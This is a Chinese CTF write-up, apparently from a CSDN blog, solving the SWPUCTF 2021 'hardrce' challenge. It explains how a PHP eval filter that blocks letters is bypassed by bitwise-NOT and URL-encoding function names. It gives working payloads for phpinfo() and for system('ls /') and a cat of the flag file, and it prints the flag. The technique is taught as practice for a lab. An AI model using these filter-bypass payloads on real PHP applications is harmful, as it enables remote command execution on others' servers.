• NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)


    代码审计:

    使用get方式请求给wllm传参

    使用preg_match函数正则匹配过滤掉了一些符号

    '\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`'

    以及 [a-zA-Z] 即所有的大小写字母

    如果传入内容满足这些条件则会执行eval函数

    URL编码取反绕过正则实现RCE:

    直接传入肯定不行

    此时我们可以对需要使用的函数进行取反,然后再进行URL 编码;

    在发送 payload 的时候将其取反,便可还原代码;

    因为取反操作后基本上用的都是不可见字符,所以不会触发正则匹配

    对于没有参数的函数,比如phpinfo();

    这里没有过滤括号和分号,所以我们对phpinfo取反编码再取反即可

    使用~对phpinfo进行取反操作,再使用urlencode函数对其进行编码

    得到 %8F%97%8F%96%91%99%90

    构造payload:?wllm=(~%8F%97%8F%96%91%99%90)();   #phpinfo();

    传入之后成功回显

    注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式,否则在取反之前PHP解释器并不知道是要执行一个函数,取反之后就算是一个函数也不会被当作代码执行。

    我们可以验证一下,如果将phpinfo()整体取反编码再取反,是否会执行呢?

    得到%8F%97%8F%96%91%99%90%D7%D6

    构造payload:?wllm=(~%8F%97%8F%96%91%99%90%D7%D6);   

    按道理来说它也是 phpinfo();

    但是传入之后发现代码并没有被执行

    因此我们在使用这种方法的时候一定要注意满足要求的格式

    接下来我们介绍有参数的函数:

    同样需要满足上述要求,不同的是需要分别对其中的字符进行编码

    比如我们想执行system('ls /');

    分别对 system 和 ls / 进行取反、编码,输出"\n"是用来换行

    得到

    %8C%86%8C%8B%9A%92

    %93%8C%DF%D0

    再分别对它们再次进行取反操作

    构造payload:?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

    命令执行成功,发现存在名为flllllaaaaaaggggggg的文件

    我们尝试获取它

    构造payload: ?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

    拿到flag

    NSSCTF{36209fa9-5341-4a17-b668-ac020cdee0e6} 

  • 相关阅读:
    追求性能极致:客户端缓存带来的革命
    BI 如何让SaaS产品具有 “安全感”和“敏锐感”(上)
    PM3398B-6-1-3-E 80026-172-24 PM3398B-6P-1-3P-E
    深度学习之压缩模型大小且不掉点的方法---知识蒸馏
    GitLab使用
    【无标题】
    sentinel----隔离和降级
    08【MyBatis之动态SQL】
    Python编程——模块、包和__init__.py
    《互联网大厂晋升指南》读书笔记-下
  • 原文地址:https://blog.csdn.net/Myon5/article/details/133768393